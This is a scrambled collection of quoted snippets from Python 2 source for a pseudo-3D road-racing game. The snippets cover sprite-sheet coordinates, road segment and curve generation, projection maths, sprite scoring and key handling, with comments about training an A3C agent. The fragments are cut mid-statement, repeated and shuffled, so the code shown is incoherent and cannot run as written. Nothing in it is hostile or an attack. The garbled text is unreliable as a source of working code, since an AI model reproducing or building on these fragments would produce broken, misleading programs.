curve, rad):", "# grass self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0,", "= int(math.ceil(pos / self.seg_len)) seg_n = len(self.segments) i = (i", "0.0 self.xc = 0.0 self.yc = 0.0 self.zc = 0.0", "= 0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed = 0.3#0.15# def rd_reset(self,", "# for sprites render order self.track_len = 0.0 self.seg_len =", "ys2, xsr4, ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve test", "{ 'x': 245, 'y': 1262, 'w': 215, 'h': 220 },", "897, 'w': 235, 'h': 118 }, 'BUSH2': { 'x': 255,", "'STUMP': { 'x': 995, 'y': 330, 'w': 195, 'h': 140", "def util_limit(self, value, mn, mx): return max(mn, min(value, mx)) def", "obj: # None or 0 return #rd_w_half = self.road_w /", "seg['index'] < segbi: zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len else:", "#xc1 = self.road_w / 2 - self.player_x #xc2 = -self.road_w", "self.d = 200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h = self.size[1] if", "total = enter + hold + leave for n in", "seg['p1']['world'].get('y', 0.0) #print '-' * 30 ''' ''' #x# if", "if 3 in e_keys_up: if self.player_di != 1: self.player_di =", "/ 2 - self.player_x #xc2 = -self.road_w / 2 -", "FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self, num, height): num = num", "when go out the road if self.player_x < -self.road_w /", "#self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for i in range(n):", "= 10000 if x_i == 0: sprt_at = 40 elif", "*args, **kwargs): super(FPSptRoadB, self).__init__(size) self.cfg = cfg self.car = kwargs.get('car')", "random.random() * 10.0 else: curve = rl * random.random() *", "seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] ''' zw1 = (i+1)*self.seg_len zw2 =", "# <1> zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 =", "= enter + hold + leave for n in range(enter):", "sky.rect.left -= sky.rect.width * 2 if self.speed <= 0.0: return", "k == self.pglc.K_v or k == self.pglc.K_n: return 2 elif", "else: return # NOTE: here we should use the segment", "70#340 self.prog.rect.left = 610 #self.prog.rotate(180) self.disp_add(self.prog) self.spd = FPSptProgress((4, 100),", "seg = self.segments[si] #''' ''' #x# if seg['index'] < segbi:", "'MEDIUM': 4, 'HARD': 6 }, 'HILL': {'NONE': 0, 'LOW': 20,", "'segbi', segbi, ' / ', seg_n self.player_seg = self.segments[segbi] self.base_seg", "- curve_d * i #xc3 = self.road_w / 2 -", "math.tan(theta1) dx2 = self.seg_len * math.tan(theta2) xs1 += dx1 xs2", "'CACTUS': { 'x': 929, 'y': 897, 'w': 235, 'h': 118", "- self.player_x xc3 = self.road_w / 2 - self.player_x xc4", "self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc, self.d, zc1) ys1 = self.yp_to_ys(yp1,", "end_y = start_y + (int(yw) * self.seg_len) total = enter", "for a segment seg_i = self.player_seg['index'] if seg_i > self.last_seg_i:", "__file__) self.road.rd_seg_json_save(segs_file) def handle_event(self, events, *args, **kwargs): #return events r_events", "* math.sin(tht) pnts.append([x, y]) #print pnts return pnts def draw_segs(self,", "= str(seg['index']) + '_' + str(i) + '_' + sprt", "#self.player_x += self.player_x_dt self.player_x += self.speed / 5 + 20", "2) def util_ease_out(self, a, b, percent): return a + (b", "draw_segs(self, segs, rad): pnts = self.get_segs_pnts(segs, rad) #print pnts if", "'DEAD_TREE2': { 'x': 1205, 'y': 490, 'w': 150, 'h': 260", "print e self.init_rd_segs_rand_1() else: if not keep_segs: self.init_rd_segs_rand_1() self.draw_on() self.rd_seg_render()", "* 30 ''' # grass self.render_polygon(None, 0, ys1, self.w, ys2,", "{'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, 'DARK': {'road':", "pnts.append([x, y]) #print pnts return pnts def get_segs_pnts_1(self, segs, rad):", "> self.speed_max: self.speed = self.speed_max self.position += self.speed if self.position", "+ sprt obj = info.get('obj') ''' # TODO: <1> if", "{ 'x': 1085, 'y': 480, 'w': 80, 'h': 41 },", "'score': -10,}, 'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'],", "0.0) print 'world z', seg['p1']['world']['z'] print 'world y', seg['p1']['world'].get('y', 0.0)", "self.bg_sky: sky.rect.left -= 1#self.sky_speed if sky.rect.left + sky.rect.width < 0:", "train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand =", "self.seg_draw_n = 70#100#200#150 self.speed = 0.0 self.position = 0.0 self.player_x", "seg_n #print si seg = self.segments[si] #''' ''' # for", "- self.camera_z) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1,", "= zw2 - self.camera_z - self.position # for curve xc1", "1097, 'w': 232, 'h': 152 }, 'BILLBOARD03': { 'x': 5,", "* sound \"\"\" import math import random import time from", "0 #print 'b_curve', b_curve #print 'world z', self.player_seg['p1']['world']['z'] #print 'world", "'h': 152 }, 'BILLBOARD03': { 'x': 5, 'y': 1262, 'w':", "# rd_w_half - self.lane_w] sprt_x = obj.rect.left sprt_w = obj.rect.width", "self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1) self.bg_hills2 = FPSptBg('img_flatpath/images/background.png',", "update #dpx1 = self.seg_len * math.tan(theta_i) #self.player_x -= dpx1 #", "41 }, 'PLAYER_RIGHT': { 'x': 995, 'y': 531, 'w': 80,", "in events: #print event if event.type == self.pglc.KEYUP: k =", "seg.get('curve', 0.0) xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1,", "trees in self.bg_trees: trees.rect.left += int(self.tree_speed * p_dt) if trees.rect.left", "this seg is looped seg_scale = self.geo_prjc_scale(self.d, zc1) x_rnd =", "segbi, ' / ', seg_n self.player_seg = self.segments[segbi] self.base_seg =", "for k, v in seg.items(): if k not in ['sprites']:", "= xc3 - self.lane_w #xcl4 = xc4 + self.lane_w xcr1", "seg_n / 20 n = seg_n / random.randint(10, 30) for", "- a) * ((-math.cos(percent * math.pi)/2) + 0.5) def util_curve_percent_remaining(self,", "= (ys1 + ys3) / 2.0 x_dt = x_rnd *", "1085, 'y': 480, 'w': 80, 'h': 41 }, 'PLAYER_RIGHT': {", "p_curve * self.centrifugal #p_dt = 40 #p_dt = -40 #p_dt", "GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt') sf.mainloop() if __name__ == '__main__':", "self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left += sky.rect.width", "rd_sprts_render(self, seg, x_pos, x_i, y, scale): sprts = seg.get('sprites') if", "{ 'x': 1383, 'y': 760, 'w': 88, 'h': 55 },", "dx_curve = - (b_curve * b_percent) x_curve = 0 #print", "for a3c train self.rd_seg_init_rand(segnrand) # for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200", "= xc2 + self.lane_w xcl3 = xc3 - self.lane_w xcl4", "in range(n): j = random.randint(10, seg_n - 10) sprt =", "cv_l = 0.0 else: rad_m = 0.5#1.0#0.1# else: if cv_s:", "-= mx while (result < 0): result += mx return", "render road sprites # TODO: check if this seg is", "- y, self.size[0] - 2, y]) class FPStraight(pygm.PyGMSprite): def __init__(self,", "self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs): super(FPSceneA, self).__init__(*args,", "= xsr1 x_sprt = (xsr1 + xsl1) / 2.0 #x_sprt", "40#454 self.scr.rect.left = 600 self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16)", "- self.player_x #xcl1 = xc1 - self.lane_w #xcl2 = xc2", "= random.randint(3, 30) segnrand = random.randint(2, 6) # for a3c", "min(value, mx)) def util_accelerate(self, v, accel, dt): return v +", "+= dx2 #+ dx1 ''' self.render_polygon(None, 0, ys1, self.w, ys2,", "= xc4 + self.lane_w xcr1 = self.lane_w - self.player_x xcr2", "= math.asin(a) return tht_d def get_segs_pnts(self, segs, rad): pnts =", "'w': 360, 'h': 360 }, 'DEAD_TREE1': { 'x': 5, 'y':", "self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2)", "zc2) xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 = self.xc_to_xp(xcr4, self.d, zc2)", "self.player_di != 3: self.player_di = 0 if 3 in e_keys_up:", "= self.key_to_di_b(event.key) if di is not None: e_keys_up.append(di) else: r_events.append(event)", "'score': -50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'],", "= random.randint(10, 100) hold = random.randint(10, 100) leave = random.randint(10,", "mx return result def util_ease_in(self, a, b, percent): return a", "0.5) def util_curve_percent_remaining(self, n, total): return (n % total) /", "2)) def util_ease_in_out(self, a, b, percent): return a + (b", "== 0.0: self.tm_start = time.time() self.tm_end = self.tm_start else: self.tm_end", "5, 'w': 360, 'h': 360 }, 'DEAD_TREE1': { 'x': 5,", "animate / ... 'obj': None, # need to create at", "#print p_dt #self.player_x -= p_dt self.player_x += p_dt def check_if_car_out_road(self):", "None: e_keys_up.append(di) else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: di =", "'y': 555, 'w': 328, 'h': 282 }, 'BOULDER3': { 'x':", "!= 3: self.player_di = 0 if 3 in e_keys_up: if", "a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20, 2.0) ##self.add_low_rolling_hills(30, 4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand", "# <1> #for i, seg in enumerate(self.segments): # <2> for", "will be deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img = FP_ROAD_SPRTS[sprt]['imgs'][0]", "for sprites render order self.track_len = 0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0#", "(i + 1)) xc1 = (rad - xx1) - self.player_x", "'BILLBOARD07': { 'x': 313, 'y': 897, 'w': 298, 'h': 190", "b, percent): return a + (b - a) * ((-math.cos(percent", "in enumerate(self.segments): zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 =", "consts.GREEN, # [1, 0, self.size[0] - 2, y]) # from", "- xx4) - self.player_x xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1", "2) % seg_n] # for test #self.base_seg['color'] = FP_COLORS['FINISH'] b_curve", "ca self.pygm.draw.rect(self.surf, self.c, rct) class FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args,", "self.size[0] - 2, y]) class FPStraight(pygm.PyGMSprite): def __init__(self, cfg, *args,", "curve = rl * random.random() * 8.0 yw = 0.0", "-40 elif x_i == 2: sprt_at = 580 elif x_i", "random import time from starfish import pygm from starfish import", "def rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i = math.pi /180.0 *", "seg, x_pos, x_i, y, scale): sprts = seg.get('sprites') if not", "= self.xp_to_xs(xpl4, self.w) self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3,", "= 80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top", "/ 2.0, xsl1, xsl2] #x_sprt = xsr1 x_sprt = (xsr1", "= utils.json_dumps(sc) with open(f, 'w') as fo: fo.write(s) def rd_seg_json_load(self,", "p_curve = self.player_seg.get('curve', 0.0) #print 'p_curve', p_curve p_dt = self.speed", "}, 'PLAYER_STRAIGHT': { 'x': 1085, 'y': 480, 'w': 80, 'h':", "**kwargs): pass class GMFlatpath(pygm.PyGMGame): def __init__(self, title, winw, winh, *args,", "h): #ys = h / 2.0 - h / 2.0", "range(self.seg_draw_n): #''' # <2> si = (segbi + i) %", "= 0.0 self.xs = 0.0 self.ys = 0.0 self.d =", "rad2 = rad - self.road_w / 2 yc = self.camera_h", "= self.yc_to_yp(yc2, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 =", "- self.lane_w xcl4 = xc4 + self.lane_w xcr1 = self.lane_w", "'x': 1205, 'y': 310, 'w': 268, 'h': 170 }, 'DEAD_TREE2':", "'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961, 'w': 80, 'h': 45", "+= scr def check_tm(self): if self.position > self.seg_len * 2:", "for p in pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts)", "= 0.0 #self.tm_end = 0.0 def update_bg(self): # always move", "'w': 80, 'h': 57 }, 'CAR01': { 'x': 1205, 'y':", "xcr2 - x_curve xcr3 = xcr3 - x_curve - dx_curve", "312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top = 40#454", "#tht += tht_d tht -= tht_d rad_m = 20.0#10.0#50.0# cv_s", "if seg_i > self.last_seg_i: self.last_seg_i = seg_i else: return #", "= ca self.pygm.draw.rect(self.surf, self.c, rct) class FPSptRdSprts(pygm.SptImg): def __init__(self, img_file,", "seg_scale x_pos = [xsr1, xsr2, (xsr1 + xsl1) / 2.0,", "rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def road_reset(self): self.road.rd_reset() self.rdmap_reset() def", "-self.road_w / 2 - self.player_x - curve_d * i #xc3", "order for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj) def render_polygon(self, ctx, x1,", "FP_ROAD['CURVE']['MEDIUM']) elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl *", "2 #if (car_x + car_w / 2) < sprt_x <", "percent): return a + (b - a) * math.pow(percent, 2)", "-= self.track_len #''' self.draw_on() self.rd_seg_render() def refresh(self, fps_clock, *args, **kwargs):", "= 1 elif self.player_di == 1: self.player_x += 19 if", "#p_dt = random.randint(-100, 100) #print p_dt for sky in self.bg_sky:", "self.player_x_dt self.player_x += self.speed / 5 + 20 elif self.player_di", "None: try: segs = self.rd_seg_json_load(segs_file) self.segments = segs self.track_len =", "0 elif k == self.pglc.K_k: return 1 elif k ==", "FP_COLOR_YELLOW = '#EEEE00' FP_COLOR_BLUE = '#00EEEE' FP_COLORS = { 'SKY':", "elif k == self.pglc.K_TAB: self.road_reset_keep_segs() elif k == self.pglc.K_BACKSPACE: self.road_reset_from_file()", "#print '>>> refresh' #''' if self.player_di == 3: # <", "- self.position curve_d = 500 #x#xc1 = self.road_w / 2", "spr_n[sk] = sv else: spr_n[sk] = None seg_c[k].append(spr_n) segs_c.append(seg_c) return", "range(n): self.segments[i]['color'] = FP_COLORS['START_Y'] def rd_sprts_init_rand(self, n=None): seg_n = len(self.segments)", "key_to_di_b(self, k): if k == self.pglc.K_f or k == self.pglc.K_j:", "di = self.key_to_di_b(event.key) if di is not None: e_keys_dn.append(di) else:", "*args, **kwargs): self.fill(self.clr_dark_grass) def add_fog(self): self.fog = FPSptFog(self.size) self.fog.rect.top =", "(b - a) * ((-math.cos(percent * math.pi)/2) + 0.5) def", "zw2 = seg['p2']['world']['z'] ''' zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z']", "#print 'p_curve', p_curve p_dt = self.speed * p_curve * self.centrifugal", "30 ''' ''' #x# if seg['index'] < segbi: zw1 =", "56 }, 'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961, 'w': 80,", "0: sky.rect.left += sky.rect.width * 2 if sky.rect.left - sky.rect.width", "yw = 0.0 #elif p < 0.8: # curve =", "= 3 if 0 in e_keys_up: if self.player_go != 2:", "self.score = 0 self.game_over = False self.game_score = 0.0 self.tm_start", "-FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self, num, height): num", "refresh__1(self, fps_clock, *args, **kwargs): #print '>>> refresh' #''' if self.player_di", "'x': 625, 'y': 375, 'w': 300, 'h': 170 }, 'BILLBOARD06':", "80, 'h': 57 }, 'CAR01': { 'x': 1205, 'y': 1018,", "'_' + str(i) + '_' + sprt obj = info.get('obj')", "310, 'w': 268, 'h': 170 }, 'DEAD_TREE2': { 'x': 1205,", "* self.seg_len, 'y': self.seg_lasy_y()}, 'camera': {}, 'screen': {}}, 'p2': {'world':", "'y': 555, 'w': 298, 'h': 190 }, 'BILLBOARD05': { 'x':", "car_w / 2) #print '-' * 40 w_half = car_w", "GMFlatpath(pygm.PyGMGame): def __init__(self, title, winw, winh, *args, **kwargs): super(GMFlatpath, self).__init__(title,", "-50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score':", "{}}, 'p2': {'world': {'z': (n + 2) * self.seg_len, 'y':", "self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top = 240 self.road.rect.left =", "= self.xc_to_xp(xcl2, self.d, zc1) xsl2 = self.xp_to_xs(xpl2, self.w) xpl3 =", "{'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,}, #'bear':", "2.0 * yp ys = h / 2.0 - yp", "FP_COLORS['LIGHT'] #c = {'road': FP_COLOR_WHITE} else: c = FP_COLORS['DARK'] #c", "'x': 150, 'y': 555, 'w': 328, 'h': 282 }, 'BOULDER3':", "xsr3, ys3, seg['color']['rumble']) # for test #self.pygm.draw.circle(self.surf, consts.BLUE, # (int(xsr1),", "car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top = 240", "'#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'},", "= seg['p2']['world']['z'] ''' zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1", "0.0) #print 'p_curve', p_curve p_dt = self.speed * p_curve *", "self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png',", "> 0: sky.rect.left -= sky.rect.width * 2 for hill in", "as e: #print '-' * 60 pass def rd_sprts_render(self, seg,", "[x1, d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts) except", "* p_curve * self.centrifugal #p_dt = 40 #p_dt = -40", "the sprites with right order for obj in self.rd_sprt_cache[::-1]: self.disp_add(obj)", "p = random.random() #print p rl = random.choice([1, -1]) enter", "random.random() #print p rl = random.choice([1, -1]) if p <", "xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3, seg['color']['road']) def", "20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW)", "self.seg_len * math.tan(theta_i) #self.player_x -= dpx1 # <1> #for i,", "self.get_seg_base_i() print 'segbi', segbi # TODO: do at update #dpx1", "self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc2, self.d, zc2) ys3", "= [] for spr in seg['sprites']: spr_n = {} for", "events: #print event if event.type == self.pglc.KEYUP: di = self.key_to_di(event.key)", "event.type == self.pglc.KEYUP: di = self.key_to_di(event.key) if di is None:", "= 1.0 #tht_d = math.acos(a) tht_d = math.asin(a) return tht_d", "refresh(self, fps_clock, *args, **kwargs): self.rdpsd.lbl_set(str(int(self.road.speed))) self.scr.lbl_set(str(int(self.road.score))) self.tm_once.lbl_set(str(int(self.road.tm_last_once))) prg = self.road.position", "return v + (accel * dt) def util_increase(self, start, increment,", "grass self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,", "get real (random) x from x_pos 'x_i': random.randint(0, 4), 'score':", "0 self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top", "yw) def rd_start_seg_init(self, n=3): seg_n = len(self.segments) if seg_n ==", "if self.player_x < -self.road_w / 2 or \\ self.player_x >", "= ys3 #''' #if 1: #if i < self.seg_draw_n /", "'h': 140 }, 'TREE2': { 'x': 1205, 'y': 5, 'w':", "'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, 'DARK': {'road': '#696969', 'grass':", "for sk, sv in spr.items(): if sk not in ['obj']:", "color): #d = 200#100#240#50# #a = 60 #pnts = [[x1,", "self.e_keys_up = [] self.e_keys_dn = [] self.camera_x = 0.0 self.camera_y", "- 1) # NOTE: not used now !! ##x_i =", "not self.flag_check_event: return events else: return self.check_key(events) def key_to_di(self, k):", "elif x_i == 5: sprt_at = -1100 #print 'sprt_x', sprt_x", "percent): return a + (b - a) * ((-math.cos(percent *", "self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase): def __init__(self, size, c=[0, 81, 8,", "- dx_curve xcr4 = xcr4 - x_curve - dx_curve x_curve", "zc == 0.0: #yp = float('inf') #yp = 2 **", ": go to a new road TODO: * hill road", "info in enumerate(sprts): sprt = info['name'] obj_k = str(seg['index']) +", "'h': 220 }, 'BILLBOARD02': { 'x': 245, 'y': 1262, 'w':", "= self.segments[:-self.seg_draw_n] return segs # #### geometry #### # def", "xp = xc else: xp = xc * (d /", "or 0 return obj = sprt.get('obj') if not obj: #", "#pnts = [[x1, y1], [x2, y2], [x3, y3], [x4, y4],", "def rd_start_seg_init(self, n=3): seg_n = len(self.segments) if seg_n == 0:", "__init__(self, cfg, *args, **kwargs): super(FPStraight, self).__init__() self.cfg = cfg self.bg_sky1", "zc1 = zw1 - self.camera_z - (self.position % self.seg_len) zc2", "2, 0) class SptTmpi(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(SptTmpi,", "geometry #### # def geo_prjc_scale(self, d, zc): if zc ==", "mx): # with looping result = start + increment while", "event.type == self.pglc.KEYDOWN: di = self.key_to_di(event.key) if di is None:", "'world z', seg['p1']['world']['z'] print 'world y', seg['p1']['world'].get('y', 0.0) #print '-'", "fo: fo.write(s) def rd_seg_json_load(self, f): with open(f, 'r') as fi:", "480 }, 'TREES': { 'x': 5, 'y': 985, 'w': 1280,", "trees.rect.left + trees.rect.width < 0: trees.rect.left += trees.rect.width * 2", "segs_file=None): if not segs_file: segs_file = 'sr_roads/sr_road_' + str(int(time.time())) +", "__init__(self, title, winw, winh, *args, **kwargs): super(GMFlatpath, self).__init__(title, winw, winh)", "#x# zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1", "'health': {'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,},", "= math.pi / 2.0 / 60#10#20 rad = self.road_w *", "+= dx2 #+ dx1 xs4 += dx2 #+ dx1 #'''", "0: sprt_at = 40 elif x_i == 1: sprt_at =", "self.seg_len except Exception as e: print e self.init_rd_segs_rand_1() else: if", "obj.rect.width / 2 #obj.scale(scale) info['obj'] = obj ##self.disp_add(obj) # NOTE:", "def rd_sprts_render(self, seg, x_pos, x_i, y, scale): sprts = seg.get('sprites')", "k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self, value, mn, mx):", "**kwargs): super(FPSptSprts, self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase): def __init__(self, size, c=[0,", "k): if k == self.pglc.K_f or k == self.pglc.K_j: return", "894, 'w': 80, 'h': 57 }, 'CAR01': { 'x': 1205,", "super(FPSptProgress, self).__init__(size) self.c_bg = c_bg self.c_prog = c_prog self.progress(0.0) def", "for sky in self.bg_sky: sky.rect.left -= 1#self.sky_speed if sky.rect.left +", "e_keys_up: if self.player_go != 1: self.player_go = 0 if 1", "xcl4 = xc4 + self.lane_w xcr1 = self.lane_w - self.player_x", "= float(curve) / rad #a *= 10.0 #print a s", "- self.player_x xcr2 = -self.lane_w - self.player_x xcr3 = self.lane_w", "self.last_seg_i: self.last_seg_i = seg_i else: return # NOTE: here we", "'y': 5, 'w': 385, 'h': 265 }, 'TREE1': { 'x':", "super(FPSptBg, self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos, *args,", "a < -1.0: a = -1.0 elif a > 1.0:", "utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up", "len(pnts) > 0: # pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0], p[1]) for", "self.cfg) self.road = FPSptRoadB((640, 240), self.cfg, car=self.car, bg_sky=[self.bg_sky1, self.bg_sky2], bg_hills=[self.bg_hills1,", "self.score = 0 self.game_over = True self.game_score = -1.0 def", "si seg = self.segments[si] #''' ''' #x# if seg['index'] <", "xp xs = w / 2.0 + xp return xs", "= self.tm_end - self.tm_start else: self.tm_start = 0.0 #self.tm_end =", "1205, 'y': 310, 'w': 268, 'h': 170 }, 'DEAD_TREE2': {", "e_keys_up): if 0 in e_keys_dn: self.player_go = 1 elif 2", "#print '-' * 40 w_half = car_w / 2 +", "{ 'x': 625, 'y': 375, 'w': 300, 'h': 170 },", "= ys1 yp3 = self.yc_to_yp(yc, self.d, zc2) ys3 = self.yp_to_ys(yp3,", "self.w) self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3,", "start, increment, mx): # with looping result = start +", "555, 'w': 298, 'h': 190 }, 'BILLBOARD05': { 'x': 5,", "# render road sprites # TODO: check if this seg", "400 self.car.rect.left = (640 - self.car.rect.width) / 2 ##self.disp_add(self.car) #", "= obj self.disp_add(obj) ''' # <2> if obj: self.disp_del(obj) #", "#self.road = FPSptRoad((640, 240), self.cfg) self.road = FPSptRoadB((640, 240), self.cfg,", "0 cv_l = 0.0 pnts.append([x, y]) for seg in segs:", "5, 'w': 215, 'h': 540 }, 'BILLBOARD08': { 'x': 230,", "self.rd_sprt_cache = [] # <1> #for i, seg in enumerate(self.segments):", "ca = 200 / n * (n - i) self.c[3]", "= 1 continue x += rad_m * math.cos(tht) y +=", "'x': 1205, 'y': 760, 'w': 168, 'h': 248 }, 'BUSH1':", "= sv else: spr_n[sk] = None seg_c[k].append(spr_n) segs_c.append(seg_c) return segs_c", "car disp add after road #self.road = FPSptRoad((640, 240), self.cfg)", "test #self.base_seg['color'] = FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0) #b_percent =", "'x': 929, 'y': 897, 'w': 235, 'h': 118 }, 'BUSH2':", "self.speed_dt_na # if on the grass, slow down if self.player_x", "#if i < self.seg_draw_n / 2: if i < self.seg_draw_n", "- y] def cv_to_engl(self, curve, rad): a = float(curve) /", "math.acos(a) tht_d = math.asin(a) # TODO: tht += tht_d rad_m", "bg_hills=[self.bg_hills1, self.bg_hills2], bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top = 240 self.road.rect.left = 0", "80 print 'self.position', self.position # <2> seg_n = len(self.segments) segbi", "random.choice([1, -1]) if p < 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl", "self.player_di = 0 def update_world(self): if self.player_go == 1: self.speed", "self.w, ys4, 0, ys3, seg['color']['grass']) # road self.render_polygon(None, xs1, ys1,", "4.0#2.0#1.0# cv_s = 0 cv_l = 0.0 pnts.append([x, y]) for", "pos) class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts,", "40 elif x_i == 1: sprt_at = -40 elif x_i", "- self.player_x xcl1 = xc1 - self.lane_w xcl2 = xc2", "'BILLBOARD09': { 'x': 150, 'y': 555, 'w': 328, 'h': 282", "tht_d rad_m = 20.0#10.0#50.0# cv_s = 0 cv_l = 0.0", "= self.segments[si] #''' ''' # for test if i <", "= FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left = 0 self.disp_add(self.fog) def", "segs_c.append(seg) else: seg_c = {} for k, v in seg.items():", "disp add after road #self.road = FPSptRoad((640, 240), self.cfg) self.road", "} class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args, **kwargs): super(SptTmpx, self).__init__(size)", "(car_x - car_w / 2), sprt_at, (car_x + car_w /", "pos is None: pos = self.position i = int(pos /", "8.0#10.0#2.0 obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt) if obj:", "'.txt' segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def handle_event(self, events, *args,", "'w': 135, 'h': 332 }, 'BILLBOARD09': { 'x': 150, 'y':", "d-y2], [x3, d-y3], [x4, d-y4], [x1, 